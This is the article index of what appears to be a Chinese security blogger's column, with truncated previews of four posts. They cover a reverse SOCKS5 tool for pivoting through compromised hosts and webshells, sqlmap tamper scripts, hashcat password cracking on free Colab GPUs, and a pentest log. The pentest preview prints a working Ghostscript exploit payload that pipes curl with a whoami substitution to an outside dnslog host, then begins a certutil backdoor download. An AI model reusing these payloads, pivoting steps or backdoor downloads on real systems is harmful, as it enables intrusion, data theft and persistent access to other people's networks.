脚本小子
关注
分享
扫一扫
安全新手,工具党
于小葵
脚本小子 && 嘴炮
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
反向socks5代理工具
github.com/yuxiaokui/gohtran闲来无事,用golang写了个反向socks5代理工具.方便搞渗透的同学们使用.首先在公网VPS上执行listener 3389 333333389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口.然后在内网的肉鸡中执行client vps_ip:3389webshell也可以玩哦.OK,配上socks5代理,尽情内网漫游吧.本工具完全开源,大家随意修改....原创 2020-09-08 15:07:43 · 1018 阅读 · 0 评论 -
【转载】sqlmap-tamper使用介绍
SQLMAP当前为1.2.7.20,共有57个tamper脚本,与1.0版本相比新增了19个脚本。序号脚本名称注释10x2char将每个编码后的字符转换为等价表达2apostrophemask单引号替换为Utf8字符3apostrophenullencode替换双引号为%00%274appendnullbyte有效代码后添加%005base64encode使用base64编码6between比较符替换为between7bl转载 2020-06-11 10:35:02 · 446 阅读 · 0 评论 -
白嫖Google Colab进行GPU解密
一.Colab简介https://colab.research.google.com/notebooks/welcome.ipynb偶然间接触到Colab,发现它居然支持GPU,而且是免费使用。官方介绍:Colaboratory 是一个免费的 Jupyter 笔记本环境,不需要进行任何设置就可以使用,并且完全在云端运行。借助 Colaboratory,可以编写和执行代码、保存和共享分析结果,以及利用强大的计算资源,所有这些都可通过浏览器免费使用。二.破解密码首先需要安装HASHCATpri原创 2020-06-11 10:32:44 · 3517 阅读 · 1 评论 -
记录一次常规的渗透测试
首先是魔图漏洞%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops然后windows下载后门。方法1:certutil.exe -urlca原创 2020-06-01 10:32:08 · 506 阅读 · 0 评论